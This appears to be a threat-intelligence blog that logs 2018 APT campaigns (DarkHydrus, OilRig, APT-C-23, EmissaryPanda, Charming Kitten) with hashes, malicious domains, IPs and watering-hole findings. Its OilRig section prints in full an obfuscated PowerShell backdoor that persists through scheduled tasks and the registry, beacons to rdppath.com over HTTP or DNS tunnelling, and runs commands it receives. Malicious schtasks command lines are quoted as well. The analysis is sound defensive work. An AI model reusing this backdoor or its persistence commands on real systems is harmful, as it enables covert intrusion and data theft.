MD5        27aaf0e49ebc240933ea5d1a04747977

SHA-1        c7e7ad6d763a41b8d3d7d9301acbe53674041d75

SHA-256        

d7bebfd87066e34d2f68ddf39d5637afa978df72bceb8dc690ed1553cdfffa43

IOCs

defender-update.com

windowspatch.com

herkhabar.com

89.248.173.131

213.227.140.35:3210

178.32.211.5

Windows Implantment Module.exe

d41207d54b69fb3eeb7a104f7d36c7b0

ea6321f55ea83e6f2887a2360f8e55b0

3cf8aff7c56cf477bde9adbd543abc40

fe466788a06fc5646bd52fe6732d59bf

27aaf0e49ebc240933ea5d1a04747977

5998ef679682878e68d5ac4a1733fac5

2820c84cf9f34fe999da0bcedea6915d

2018-07-28: DarkHydrus uses SettingContent-MS to deliver RogueRobin malware; DarkHydrus 2017 activity

Following Palo Alto’s post New Threat Actor Group DarkHydrus Targets Middle East Government, we would like to share additional information on the DarkHydrus activity.

DarkHydrus use SettingContent-MS

In July 2018, DarkHydrus used a SettingContent-MS file to deliver RogueRobin [Thanks to anonymous twitter user for the tip].

abc.SettingContent-MS

9dd647d509a3306cb11dbdb3cd8968cc

http://micrrosoft[.]net/winupdate.ps1 downloads RogueRobin:

953A753DD4944C9A2B9876B090BF7C00

The script is available here:

persistence:

C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk


C2 configuration:

DarkHydrus 2017 activity

As mentioned in our yearly report we detected targeting by DarkHydrus in October 2017. We estimated that the activity was related to CopyKittens, however this is not certain, thus we currently use DarkHydrus, the name given to the campaign by Palo Alto.

 

In a malicious email sent in October 2017, a rar file was attached.

Google translate: Dear colleagues / staff of the Ministry of Foreign Affairs. Peace, mercy and blessing of God. To view the activation of the fax service at the Ministry of Foreign affairs, I hope to review and improve how to benefit from the service. And accept my life and appreciation

 

The rar file contained a docx document that requests the user to click on an embedded bat in order to "unlock the content".

 

Running the bat file executes a PowerShell script that loads Meterpreter, followed by CobaltStrike.

 

Command and control is done via DNS requests to cisc0[.]net

IOCs

PasswordHandoverForm.docx

Users.xlsm

MicrosoftUII.bat

PasswordHandoverForm.rar

job interview form.xlsm

 

support[.]0ffiice[.]com

msdnscripts[.]com

0ffiice[.]com

hotmai1[.]com

helpdesk[.]0ffiice[.]com

micrrosoft[.]net

ftp[.]0ffiice[.]com

update[.]0ffiice[.]com

msdncss[.]com

allexa[.]net

tlb[.]stage[.]6388479[.]support[.]maccaffe[.]com

ftp[.]msdnscripts[.]com

update[.]cisc0[.]net

0utl00k[.]net

ns1[.]microsoftlab[.]ir

www[.]msdnscripts[.]com

server-rdp[.]microsoftlab[.]ir

maccaffe[.]com

mail[.]cisc0[.]net

citriix[.]net

ns2[.]microsoftlab[.]ir

cisc0[.]net

2557656[.]support[.]maccaffe[.]com

stage[.]2557656[.]support[.]maccaffe[.]com

support[.]maccaffe[.]com

aaa[.]stage[.]6388479[.]support[.]maccaffe[.]com

17771[.]support[.]maccaffe[.]com

3336[.]update[.]maccaffe[.]com

ftp[.]citriix[.]net

3336[.]support[.]maccaffe[.]com

aaa[.]stage[.]4563153[.]update[.]cisc0[.]net

www[.]maccaffe[.]com

 

http://micrrosoft[.]net/releasenotes.txt

Bd764192e951b5afd56870d2084bccfd

 

bd764192e951b5afd56870d2084bccfd

61c55e6448a5ab49affd5068dd805acb

953a753dd4944c9a2b9876b090bf7c00

377cfd5b9aad2473d1659a5dbad01d90

9dd647d509a3306cb11dbdb3cd8968cc

b439eaef9331cfbcd7d6b6f23e4ffecf

89d0f575b2d2fe16b46e4401194b1b51

 

fortiweb[.]download

owa365[.]bid

kaspersky[.]host

windowsdefender[.]win

bigip[.]stream

anyconnect[.]stream

kaspersky[.]science

www[.]symanteclive[.]download

microtik[.]stream

www[.]anyconnect[.]stream

symanteclive[.]download

www[.]bigip[.]stream

micrrosoft[.]net

www[.]kaspersky[.]host

ns103[.]kaspersky[.]host

ns102[.]kaspersky[.]host

0utlook[.]accountant

94[.]130[.]88[.]9

2018-07-27: APT-C-23 Infrastructure and Micropsia samples

E3246b90334c641ce6e34b53f6602a02         [Google Updater APK com.app.s1messenger]

5a05c515dc7fbc7a144c0eb929d7a9c0         [Samsung Magician.exe]

5e494e94053b73d01b20d48f8d8e0758         [VLC_media_player.exe]

738b3370230bd3168a97a7171d17ed64         [microsoftwindowssearchprotocolhost.exe]

Af0eeb210cdb22579166928f8a57bfc3        [HOSTAPPLICATION.EXE]

28fa66f42c6216fe7c628d3d589db114        [GoogleCrashHandler\BitMeter.exe]

5ae06be54ea7911cad447523002144e7        [SHELLAPP.EXE]

88f0568f5c3dc15894ccf74860aaf316

789c0cb1d2cdabcb5538683b58374881

young-spencer[.]com

steve-harrington[.]com

sophie-deverau[.]xyz

shailene-tris[.]xyz

shailene-hazel[.]life

max-mayfield[.]com

mauricefischer[.]club

margaery-tyrell[.]info

dardash[.]club

joycebyers[.]club

harvey-ross[.]info

davina-claire[.]xyz

arthursaito[.]club

alisonparker[.]club

62.113.207[.]181

52.10.212[.]32

46.166.161[.]228

46.166.161[.]213

46.166.161[.]212

192.169.6[.]59

192.169.6[.]159

185.207.205[.]131

Previous Research:

2018-07-02: QUADAGENT sample

Sales Modification.exe (d51c2ffce844d42bab2f2c3131e3dbd4) drops PS1:

"C:\Windows\system32\cmd.exe" /c start /b schtasks /create /sc minute /mo 5 /tn SystemDiskClean /tr "wscript.exe "C:\Users\admin\AppData\Local\Temp\SystemDiskClean.vbs" \"powershell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile 'C:\Users\admin\AppData\Local\Temp\SystemDiskClean.ps1' \""

C:\Users\admin\AppData\Local\Temp\SystemDiskClean.ps1 (C15AACACFD6D987FDE22B440D723BCE0)

Full script: available here: https://pastebin.com/xC8xYbLp 

C2: cpuproc.com

2018-06-21: EmissaryPanda waterhole in Mongolia's president and parliament websites

Below is further analysis based on pivoting from Kaspersky’s post about EmissaryPanda / APT27 - “LuckyMouse hits national data center to organize country-level waterholing campaign”.  
One of the indicators in the post is
google-updata[.]tk. It pointed to 103.75.190.19, on which we can see two other suspicious domains:

https://community.riskiq.com/search/103.75.190.19 

govmn[.]tk likely impersonates the website of the Government of Mongolia (gov.mn)

Also, this IP was seen loaded from a script inside two websites during March, that were likely breached:

The IP likely hosted BEeF in the follwoing path: http://103.75.190[.]19/hook.js

IOCs

Domain        govmn[.]tk

Domain        activity[.]maacson[.]com

Domain        bbs[.]maacson[.]com

Domain        dns[.]itbaydns[.]com

Domain        fasterwall[.]com

Domain        static[.]fasterwall[.]com

Domain        wh0am1[.]itbaydns[.]com

Domain        www[.]fasterwall[.]com

Domain        www[.]maacson[.]com

Domain        www[.]windows-updata[.]tk

Hash        1e9b5c685640df11659aea7748d9bf3df70aadcf

Hash        2144aa68c7b2a6e3511e482d6759895210cf60c67f14b9485a0236af925d8233

Hash        534a0deac63f7229836eeff452c7b4172c7c3a7941b6d1b7ddeaadf083d384e3

Hash        70001fc1aad6361ab8f255850796c48ffcad758a

Hash        79794d87f1b3e71e0f9df6f653b9dda1

Hash        9063797b6ebe0cb1c83cde2c15d9c69736d53c71

Hash        cf469c80df51b283f998717ff23e8f24

Hash        d2ebd63b9038e7d77b8773bdba309beb7c46c593

IPv4Address        103[.]75[.]190[.]239

IPv4Address        103[.]75[.]190[.]28

IPv4Address        112[.]137[.]167[.]39

IPv4Address        119[.]15[.]87[.]114

IPv4Address        213[.]109[.]87[.]58

IPv4Address        98[.]143[.]148[.]123

URL        http://103[.]75[.]190[.]19/hook[.]js

URL        https://google-updata[.]tk/hook[.]js

2018-06-12 Charming Kitten waterhole

69.30.221.126 showed up In our report about Charming Kitten ( https://www.clearskysec.com/charmingkitten/). It seems the attackers kept using it, (or that someone else took over it and also used it maliciously).

On PassiveTotal we can see that new domains are pointing to it: https://community.riskiq.com/search/69.30.221.126 

Inside the legitimate website of The Jewish Journal (jewishjournal.com)[2], we see an impersonating domain from the list above: jewishjournal[.]us. We estimate that the attackers breached jewishjournal.com and inserted a new page into it, serving as a watering hole:
www.jewishjournal[.]com/webinar/        

Indeed, we found inside a javascript file loaded from http://178.32.48[.]50:8443/node.js.  

This JS file is BeEF - The Browser Exploitation Framework Project:

Impersonating Deutsche Welle

On another IP, 207.38.90.21, we found an impersonation to Deutsche Welle, Germany's public international broadcaster[3]: https://community.riskiq.com/search/207.38.90.21  deutcshewelle\.org :

Currently redirects to the legitimate website of Deutsche Welle

Likely another impersonating domain is:

deutcshewelle[.]com

Also, frostsullivan[.]org is likely impersonating Frost & Sullivan, a business growth consulting company.

IOCs

69.30.221.126

69.30.221.125

207.38.90.21

jewishjournal\.us        

deutcshewelle\.org        

deutcshewelle\.com

frostsullivan\.org

ns2.deutcshewelle.com        

ns1.deutcshewelle.com        

www.deutcshewelle.com        

mail.jewishjournal.us        

mx0.jewishjournal.us        

ns1.jewishjournal.us        

win-ptf9aurtg8u.jewishjournal.us        

ns2.jewishjournal.us        

2018-06-07: Oilrig - DMI Connect

https://twitter.com/ClearskySec/status/1004749887966244865

https://app.any.run/tasks/99b3bb26-70ed-469a-a499-9391d528da37

Based on the name of the sample - DMI Connect.doc and the submission from Arab Emirates, potentially the target could be "Dubai Media Incorporated (DMI)", the official media organization of the government of Dubai. Another possible target is Diesel Marine International (DMI) that does surface engineering (http://www.dmidubai.ae/about-dmi-dubai/). It is also possible that the attacker is using the name of one of these organization to target another organisation.

MD5          : 485041067b8e37d3b172f5c0e700bff1

SHA1         : e8eeec7ebcd0801999a672b871f74d2a5e36d98b

SHA256       : d7130e42663e95d23c547d57e55099c239fa249ce3f6537b7f2a8033f3aa73de

Type         : MS Word Document

First seen   : 2018-06-05 08:43:36 UTC

Last seen    : 2018-06-05 08:43:36 UTC

First name   : DMI Connect.doc

First source : b75d8710 (web)

First country: AE

C2: rdppath[.]com

"C:\Windows\system32\cmd.exe" /c start /b schtasks /create /sc minute /mo 5 /tn Office365DCOMCheck /tr "wscript.exe "C:\Users\admin\AppData\Local\Temp\Office365DCOMCheck.vbs" \"powershell.exe -ExecutionPolicy bypass -WindowStyle hidden -NoProfile 'C:\programdata\Office365DCOMCheck.ps1' \""

C:\Users\admin\AppData\Local\Temp\Office365DCOMCheck.vbs

C:\programdata\Office365DCOMCheck.ps1

C:\Users\admin\AppData\Local\Temp\Office365DCOMCheck.vbs

CreateObject("WScript.Shell").Run "" & WScript.Arguments(0) & "", 0, False

C:\programdata\Office365DCOMCheck.ps1

param(

[string]${SvNa`Me}=("{0}{4}{2}{3}{1}" -f 'Office36','ck','M','Che','5DCO'),

[string]${seRVeRdo`mA`IN}=("{2}{3}{0}{1}"-f'.c','om','r','dppath')

)

function DB64([string]${En`CODed}){

${N`SP} = ${e`NcO`DED} -replace ' '

${sT`Rb} = new-object System.Text.StringBuilder

for(${I}=0;${i} -lt ${N`Sp}.Length;${i}++){

    if(${N`Sp}[${I}] -eq '0' ){

        if(${N`SP}[${I}+1] -eq '0'){

                ${N`ULl} = ${s`TRB}.Append('0')

        }

        if(${n`sP}[${i}+1] -eq '1'){

                ${nU`LL} = ${S`TRB}.Append('=')

        }

        if(${n`SP}[${i}+1] -eq '2'){

                ${nU`lL} = ${S`Trb}.Append('/')

        }

        if(${N`SP}[${i}+1] -eq '3'){

                ${N`ULl} = ${s`Trb}.Append('+')

        }

        ${I}++;

    }

    else{

        ${nU`LL} = ${st`Rb}.Append(${n`sp}[${I}])

    }

}

${NE`w`Arr} = ${St`RB}.ToString()

${de`Cod`ed} = [System.Convert]::FromBase64String(${n`EWArr});

${DE`cOd`Ed};

}

           

function EB64([byte[]]${deC`oD`Ed}){

${n`sP} = [System.Convert]::ToBase64String(${D`ecOD`eD})

${s`TrB} = new-object System.Text.StringBuilder

for(${i}=0;${I} -lt ${n`sP}.Length;${I}++){

    if(${N`SP}[${i}] -eq '0' ){

        ${n`ULL} = ${St`Rb}.Append('00')

    }

    elseif(${N`sP}[${I}] -eq '='){

        ${Nu`LL} = ${S`Trb}.Append('01')

    }

    elseif(${N`sp}[${I}] -eq '/'){

        ${n`Ull} = ${S`Trb}.Append('02')

    }

    elseif(${N`Sp}[${I}] -eq '+'){

        ${nU`ll} = ${s`TRB}.Append('03')

    }

    else{

        ${N`ULL} = ${S`TRb}.Append(${n`sP}[${I}])

    }

}

${ST`RB}.ToString()

}

function DAES(${K`Ey}, ${BY`Tes}){ ${IV} = ${BYT`Es}[0..15];${A`EM} = MA ${K`eY} ${iv};${dE`cr`YPt`OR} = ${a`EM}.CreateDecryptor();${ue`d`AtA} = ${D`eC`RyptoR}.TransformFinalBlock(${B`YteS}, 16, ${ByT`es}.Length - 16);${uE`datA};}

function EAES(${K`Ey}, ${BYT`ES}){ ${a`em} = MA ${k`eY}; ${ENC`Ry`PTOR} = ${a`Em}.CreateEncryptor(); ${e`d`AtA} = ${ENc`RY`p`ToR}.TransformFinalBlock(${by`Tes}, 0, ${bYt`es}.Length);[byte[]] ${FUll`DA`Ta} = ${A`Em}.IV + ${e`Data} ;${fU`L`Ld`Ata};}

function MA(${k`eY}, ${i`V}){${a`Em} =New-Object ("{4}{6}{0}{1}{7}{2}{5}{3}" -f 'rity.','Cr','ography.A','Managed','Syst','es','em.Secu','ypt')

${a`Em}.Mode = [System.Security.Cryptography.CipherMode]::CBC

${A`eM}.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7

${a`EM}.BlockSize = 128

${A`Em}.KeySize = 256

if (${I`V}) {

        if (${iV}.getType().Name -eq ("{0}{1}" -f'Strin','g')) {

                ${a`eM}.IV = [System.Convert]::FromBase64String(${i`V})

        }

        else {

                ${A`Em}.IV = ${I`V}

        }

}

if (${K`EY}) {

        if (${k`ey}.getType().Name -eq ("{1}{2}{0}" -f'g','Stri','n')) {

                ${A`eM}.Key = [System.Convert]::FromBase64String(${k`eY})

        }

        else {

                ${a`EM}.Key = ${K`ey}

        }

}

return ${A`EM}

}

function WebReq(${dOm`A`in},${M`et`HoD},${c`Oo`KieVAL},${b`oDy}){

${u`RL} = ("{3}{2}{1}{0}" -f '.','/www','tps:/','ht')+${dO`M`AIn}

${FF}= 0;

while(1)

{

${R`EQ} = [System.Net.WebRequest]::Create(${U`Rl});

${r`Eq}.UseDefaultCredentials = ${TR`UE}

([System.Net.HttpWebRequest]${R`eQ}).UserAgent = (("{27}{13}{32}{4}{16}{22}{23}{3}{0}{18}{25}{33}{17}{31}{9}{26}{14}{36}{28}{5}{20}{29}{21}{19}{1}{24}{8}{10}{6}{34}{30}{12}{35}{2}{15}{7}{11}"-f 'in64; x64)','me/4','.36 E','W','T','KHTML,','5','/1','11.1','bKi','3','2.246','ri/5','/5.0 (Windows','/','dge',' 1','e',' ','o) Chro',' l','ck','0.0;',' ','2.0.23','Ap','t','Mozilla','7.36 (','ike Ge','Safa','We',' N','pl',' ','37','53'))

${r`eQ}.Proxy = [System.Net.WebRequest]::DefaultWebProxy

${r`Eq}.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials

${C`oO`k`IeJaR} = new-object System.Net.CookieContainer;

if(${cO`o`kI`EVAL}){

        ${COO`k`iE} = New-Object System.Net.Cookie(("{0}{2}{1}" -f'PHPSE','ID','SS'),${CO`OKIE`VAl});

        ${COo`k`ie`JaR}.Add(${U`RL}, ${Co`oKie});

}

${R`EQ}.CookieContainer = ${cOo`kiE`jAR};

${R`EQ}.Method = ${mE`T`hod};

if(${bO`DY})

{

    ${r`EQ}.ContentType = ("{2}{1}{0}{3}" -f 'p','t/','tex','lain')

        ${r`EQ}.ContentLength = ${b`ODY}.length

        ${ReQu`es`T`sT`REaM} = ${r`Eq}.GetRequestStream()

    ${r`eq}.servicepoint.Expect100continue =${f`A`Lse}

        ${R`Eq`UesT`STrE`AM}.Write([System.Text.Encoding]::ASCII.GetBytes(${B`ody}),0,${BO`dY}.length)

        ${REq`UE`ST`StRe`AM}.Close()

}

Try{

    ${RE`sP} = ${R`EQ}.GetResponse()

        ${te`st} = (New-Object System.IO.StreamReader(${r`eSp}.GetResponseStream())).ReadToEnd();

    ${Z}=0

    if( (${r`esP}.StatusCode -ne 200) -or (${T`esT}.Length -and ((${TE`sT} -replace ' ') -notmatch "^[A-Za-z0-9]*$")) ){1/${z}}

    break

}

Catch

{

    if(!${Ff}){

        ${Ff}=1

        ${U`Rl} = ("{1}{3}{2}{0}" -f'ww.','http','//w',':')+${D`OM`Ain}

    }

    else{

        try{

            ${i`d} = ${EnV:U`sER`D`Om`AIN}+'\'+${ENV`:US`erNA`me}

            ${cre`Ds} = new-object System.Net.NetworkCredential(${I`D},("{0}{1}"-f 'p','ass'))

            ${r`Eq}.Credentials = ${Cr`EdS}

            ${R`eSp} = ${r`eQ}.GetResponse()

                    ${t`EST} = (New-Object System.IO.StreamReader(${Re`SP}.GetResponseStream())).ReadToEnd();

            ${z}=0

            if( (${r`EsP}.StatusCode -ne 200) -or (${t`EST}.Length -and ((${te`sT} -replace ' ') -notmatch "^[A-Za-z0-9]*$")) ){1/${Z}}

            break

        }

        catch{

            return 0

    }

    }

}

}

${COo`K`IEs} = ${cOO`Ki`e`jaR}.GetCookies(${u`Rl});

${te`ST}

if( ${Co`ok`IES} -and ${C`OoK`IEs}[0].Name -eq ("{0}{1}{2}" -f 'PHPSESS','I','D') -and ${sesS`V`Ar} -ne ${cOoki`Es}[0].Value )

{

        ${c`o`OKiEs}[0].Value

}

}

function Query(${Dn`AMe}){  

${t`RY} = 0;

do{

    if(${T`Ry} -ne 0)

    {Start-Sleep -m 50}

    try{

        if(${gl`oba`L:O`sV})

        {

            ${DN} = ${dNa`Me}+'.'

            ${qQ} = nslookup.exe -q=aaaa ${dN} | where{${_} -match ("{0}{1}{2}"-f '.','*:.*:.','*')}

            return [net.ipaddress]::Parse([System.Text.Encoding]::ASCII.GetString(${q`Q}[10..${Q`q}.Length])).GetAddressBytes()

        }else{

            ${R} = Resolve-DnsName -Name ${D`Na`mE} -Type AAAA -DnsOnly

            return [System.Net.IPAddress]::Parse(${r}.IP6Address).GetAddressBytes()

        }

    }

    catch{}

    ${t`Ry}++

}while(${P`AR`TS}.length -ne 8 -and ${t`RY} -lt 3)

return 0;

}

function get-res(${R`es},${Rr}){

${D`ATA} = @()

${T`mP} = [byte[]]${R`Es}[12..15]

[array]::Reverse(${t`MP})

${c`Ou`NT} = [System.BitConverter]::ToUInt32(${t`Mp},0)

           

for(${I}=0;${i} -lt ${C`ouNT};${I}++)

{

    ${d`N`AmE} = 'www'+${i}+'.'+${r`R}+"."+${SerVe`R`DOmA`iN}

    ${d`AtA} += Query  ${dN`AmE}

}

${D`Na`ME} = ("{1}{0}" -f'ww.','w')+${R`R}+"."+${sERVe`RdOmA`in}

${r`ES} = Query ${dn`Ame}

${f} = [array]::IndexOf(${D`ATa},[byte]124)

           

if( ${F} -ne -1 )

{

    if( ${f} -ne 0 )

    {

            [System.Text.Encoding]::ASCII.GetString(${da`TA}[0..(${f}-1)])

    }

    ${l} = [array]::IndexOf(${d`ATA}[(${F}+1)..${D`ATa}.length],[byte]124)

    if( ${l} -ne -1 )

    {

        ${Le`N`GTh} = [System.Convert]::ToInt32( [System.Text.Encoding]::ASCII.GetString(${da`TA}[(${F}+1)..(${F}+${l})]) )

        if( ${Leng`Th} -gt 0 )

        {

            ${Da`TA}[(${F}+2+${L})..(${F}+${L}+1+${lE`NGth})]

        }

    }

}

}

function DNS-Con(${d`mo`De},${CoOK`i`Ea`Vl},${pda`TA}){

${r`R} = (Get-Random -Min 100000 -Max 999999).ToString()

if(${dM`oDE} -eq 0)

{

    ${d`NaME} = ("{1}{0}" -f'l.','mai')+${rR}+'.'+${SER`VERD`Oma`in}

    ${r`eS} = Query ${Dna`mE}

    ${S`D`ATA} = ${En`V:usERDo`M`A`IN}+'\'+${eNV:uSeR`Na`me} + ("{1}{0}"-f's',':pas')

    ${Id} = [System.Text.Encoding]::ASCII.GetBytes(${s`DaTa})

    ${D`Id} = EB64 ${id}

    ${D`N`AmE} = ${d`iD}+'.'+${R`R}+'.'+${S`eRVer`D`OMa`in}

}

else

{

    ${Dn`AME} = ("{1}{0}" -f '.','ns1')+${r`R}+'.'+${SERV`e`Rd`OMa`IN}

    ${R`Es} = Query ${D`N`AME}

    ${d`N`AMe} = ${coO`k`iEaVl}+'.'+${R`R}+'.'+${SErv`ERdO`mAIn}

    ${r`ES} = Query ${d`Na`me}

    if(${dmo`DE} -eq 2){

        ${CO`U`Nt} = [int][math]::Ceiling(${pdA`Ta}.length/60)

        for(${pn}=0;${p`N} -lt ${c`oUNt} ;${P`N}++){

            ${S`ize} = 60

            if(${Pn} -eq ${COU`NT}-1 -and ${P`d`Ata}.length%60 -gt 0)

            {${sI`ZE}=${pd`Ata}.length%60}

            ${dNA`me} = ${p`dAta}.substring((${Pn}*60),${s`IZE})+'.'+${R`R}+'.'+${s`ERVErd`om`AIN}

            ${R`es} = Query ${d`N`AME}

        }

    }

    ${Dn`Ame} = ("{0}{1}"-f 'n','s2.')+${RR}+'.'+${s`e`RVerd`OmAIN}

}

${R`eS} = Query ${D`NA`mE}

${r`VAL} = get-res ${r`Es} ${r`R}

if( ${RV`AL} ){${r`Val}}

else{return 0}

}

${glO`BAl`:OSv} = 0

if([System.Environment]::OSVersion.Version.Major -eq 6 -and [System.Environment]::OSVersion.Version.Minor -lt 2)

{${G`lobAl:o`SV} = 7}

${f`F} = ${e`NV:tE`MP}+"\" +${s`V`NaMe}+("{0}{1}"-f'.vb','s')

if((Test-Path ${fF}) -eq ${FA`Lse})

{[System.IO.File]::WriteAllText(${F`F},("CreateObject(`"WScript.Shell`").Run "+"`"`" "+'& '+'WSc'+'ript.A'+'rgumen'+'ts(0'+') '+'& '+"`"`", "+'0,'+' '+'F'+'alse'))}

${Ta`SK} =  cmd /c start /b schtasks /query /fo csv | where{${_} -notmatch ("{1}{0}"-f 'askNa','T')} | findstr ${Sv`N`AmE}

${E`XecUTa`BLE} = ("{1}{2}{0}"-f'exe','wscript','.')

${r`Un} = ${mY`I`NVo`CaTIon}.MyCommand.Definition

${a`Rgs} = '"'+${ff} + ("`" "+"\`"powershell.exe "+'') +((("{8}{3}{9}{10}{14}{15}{6}{0}{12}{5}{11}{4}{1}{2}{7}{13}"-f 'yp','e',' hidden -NoProf','E','l','-','onPolicy b','il',' -','xec','u','WindowSty','ass ','e JuM','t','i')).RePLacE(([char]74+[char]117+[char]77),[sTRInG][char]39))+${r`UN}+"' "+' \"'

if( ${t`Ask} -eq ${N`UlL}){

    ${t`R} = ${eXEc`U`TAB`le}+' '+ ${A`RgS}

    cmd /c start /b schtasks /create /sc minute /mo 5 /tn ${sV`N`AMe} /tr ${tr}

 }

${v`AL} = Get-ItemProperty -Path ((("{2}{0}{1}"-f 'kc','u:{0}','h'))  -f[CHar]92) -Name ${s`V`NAmE}

if( ${V`Al} ){

        ${va`Ls} = ${v`Al}.${S`Vna`ME} -split '_'

        ${s`ES`SVar} = ${v`ALs}[0]

    ${eP`SK} = ${va`ls}[1]

}

${d`Ns}=0

if(!${SeSS`VAr}){

    ${HttP_`R`Es} =  WebReq ${S`ERver`dom`Ain} "GET"

    ${D`NS}=0

    if( ${Http_`ReS} -eq 0){

        ${D`NS} = 1

        ${HTTp`_R`ES} = DNS-Con 0 ${SeSs`V`Ar}

    }

    if(${htt`p_R`ES} -is [system.array] -and ${Htt`p_r`ES}[0].length -gt 1){

        if(${D`NS}){

            ${s`eSSV`Ar} = ${Ht`Tp_`RES}[0]

            ${Ep`Sk} = EB64 ${HtTp_R`ES}[1..${HtT`P`_REs}.Length]

        }

        else{

                ${E`Psk} = ${H`Ttp_`REs}[0]

                ${SEs`SV`Ar} = ${HTTp_`ReS}[1]

        }

        ${STo`RIn`gV`Al} = ${s`E`SSvAr}+'_'+${E`PSk}

                New-ItemProperty -path ((("{0}{2}{1}" -f'hk','u:gQ8','c')) -CrePLacE ([char]103+[char]81+[char]56),[char]92) -Name ${svn`Ame} -Value ${STO`R`In`GVAl} -force

    }

    else{exit}

}

Try{

${H`T`T`P_res} = WebReq ${sERVEr`doMa`IN} "GET" ${se`SSvAr}

${d`NS}=0

if( ${htTp_`Res} -eq 0){

    ${D`NS} = 1

    ${http`_R`ES} = DNS-Con 1 ${s`eSS`Var}

}

    if(${H`T`TP_res} -is [system.array] -and ${h`TtP_`Res}[1] -and ${Ht`Tp_`REs}[0] -and ${HT`Tp`_ReS}[0].length -gt 1){

        if(${D`Ns}){

            ${S`EsSvAr} = ${HTtp_`REs}[0]

            ${eP`SK} = EB64 ${h`TTp_r`Es}[1..${h`Ttp_REs}.Length]

        }

        else{

            ${E`PSK} = ${Ht`TP_`ReS}[0]

                ${S`esSVAr} = ${HTtP`_R`ES}[1]

        }

        ${s`TOr`InG`VAL} = ${sess`Var}+'_'+${E`pSk}

        New-ItemProperty -path ((("{2}{0}{1}{3}"-f'kc','u:j','h','x0'))-cRepLACE  ([ChAR]106+[ChAR]120+[ChAR]48),[ChAR]92) -Name ${SV`Na`mE} -Value ${s`Tor`IN`gvaL} -force

        return

    }

    elseif( !${H`TTp_rES} -and !${H`T`TP_REs}[0] )

    {exit}

${p`sk} = DB64 ${Ep`SK}

if(${d`Ns}){${bYt`ES} = ${htT`P_`RES}}

else{ ${byT`eS} = DB64 ${hTT`P_r`es}}

${D`ATA} = DAES ${p`Sk} ${byt`eS}

if( [System.text.encoding]::ASCII.GetString(${d`Ata}[0..4]) -eq ("{0}{1}"-f 'he','llo'))

{

        ${UU`iD} = ${da`Ta}[5..40]

        ${T`ypE} = [System.Text.Encoding]::ASCII.GetString(${Da`Ta}[41])

        ${D} = ${d`ATa}[42..${D`ATa}.length]

    ${p`ReV`D`OMaiN} = ${se`Rv`ERDom`AIN}

    if(${T`Ype} -eq 'x'){

        cmd /c start /b schtasks /delete  /tn ${s`VName} /f

        Remove-ItemProperty -path ((("{1}{0}"-f 'u:TJz','hkc')).RepLACE(([cHar]84+[cHar]74+[cHar]122),'\')) -Name ${svn`Ame}

            [System.IO.File]::WriteAllBytes(${m`yINvo`CAt`iOn}.MyCommand.Definition,${D}[0..${d}.length] )

        ${reS`Ult} = [System.Text.Encoding]::ASCII.GetBytes("bye") + ${uu`id} + [System.Text.Encoding]::ASCII.GetBytes("d")

            ${e`DAtA} = EAES ${P`sk} ${reSU`Lt}

            ${B64`Byt`eS} = EB64 ${eD`ATa}

        if(${d`Ns} -eq 0 ){${Htt`P_rES} = WebReq ${p`REv`d`omaIn} ("{1}{0}" -f'T','POS') ${Se`SS`VAR} ${B`64`BytES}}

        else{${htTP`_`RES} = DNS-Con 2 ${S`es`SvaR} ${b6`4bYT`eS}}

        ${NmOd`U`LE} = ${ExecU`Ta`BLE}+' '+ '"'+${Ff} + ((("{0}{5}{1}{2}{3}{4}"-f'{0} {','ersh','ell','.','exe','0}pow'))-F [ChAr]34) +((("{7}{3}{6}{13}{10}{0}{15}{4}{11}{8}{1}{5}{2}{9}{16}{14}{12}" -f'bypa','wSty','-','ol','s','le hidden ','i',' -ExecutionP','Windo','N','y ',' -','le PQN','c','i','s','oProf'))  -rEPlace  ([CHAr]80+[CHAr]81+[CHAr]78),[CHAr]34)+${R`Un}+'"'+' "'

        cmd.exe /c ${NmoDU`LE}

    }

}

}catch{exit}

IOCs

Other parts of the infrastructure:

rdppath.com

mailpage.tech

adobeonline.net

adobelicence.com

185.236.78.32

185.236.77.98

185.174.100.56

185.161.208.37

185.161.210.84

46.105.134.228

185.174.100.56

2018-05-30: Unknown threat actor - Resume in Russian lure submitted from Belarus

Follow Up on a campaign found by

https://twitter.com/blu3_team/status/951647866531057665


A recent decoy document was served from here:

http://fose.mos2ioa[.]com/c

Which contains

Resume.scr -  845974fe7c2b1cfa931924053d605570 - Submitted from Belarus.

"C:\Users\admin\AppData\Local\Temp\RarSFX\Sfx.exe" /RarSFX/Sfx.exe

Science and Technology Corporation impersonation

On a different part of the infrastructure are these malicious hosts:

stcinet[.]com

stcnet.ddns[.]net        

https://community.riskiq.com/search/103.13.222.2 

These may be impersonating stcinet.com (Science and Technology Corporation (STC)).
Legitimate website of STC:


IOCs

PassiveTotal project: https://community.riskiq.com/projects/7ee461a5-5167-2482-f45b-1df1a5cfaf5e 

relerc.ddns.net

stcinet.com

yandexmedia.serveuser.com

ftp.shuudans.com

stcnet.ddns.net

tosya.shuudans.com

www.shuudans.com

most.shuudans.com

www.mos2ioa.com

www.nubpubwizard.jetos.com

gotomail.ddns.net

fose.mos2ioa.com

mos2ioa.com

shuudans.com

www.hellomydog.compress.to

hellomydog.compress.to

newman.jetos.com

www.worktrs.wikaba.com

worktrs.wikaba.com

www.yandexmedia.serveuser.com

mosclar.mrbonus.com

connts.zzux.com

www.stcinet.com

zgdtd65@gmail.com

mot-sdmf2003@rambler.ru

103.13.222.2

118.193.163.163

185.135.83.184

103.99.208.168

180.150.226.139

194.87.110.40

43.240.14.185

194.87.147.199

103.6.73.198

103.13.221.32

137.59.18.184

103.13.222.11

789c788dab5f50f07f39d9845057a71f

b6ca470d6a648832a5d03cd9cfaea617

845974fe7c2b1cfa931924053d605570

c9497afa34d213adf77f62ce2aadd107

63a92ffa81eabd70a69e44611b9e6227

8807d2b05093a19c221bb6599e0fd456

bc2758181552de2482d9127855484bb5

529017859f702cacdf53ffe74f1735f9

18a86bf06847bad3d6a14ec4bd5824e5e9a03d11

78be9d36f4a9f40faffeb2aad533a29a9888f641

720071a7affac2ba3491fa1e49a258618baf9821

e273cc1b2d71f273da34b48538872db20aca25e3

70256582e17826ef2969cb3af9824a3a897c09eb228876e8b0ded87d050687b7

ba111b6d3990cb0e517caff8025fd26f183422166f4fdde0e76f90afa3720ccd

fe3f0f2ede09af94f852f9638451e02c0d8005f947a27e0dc026defdec82fd24

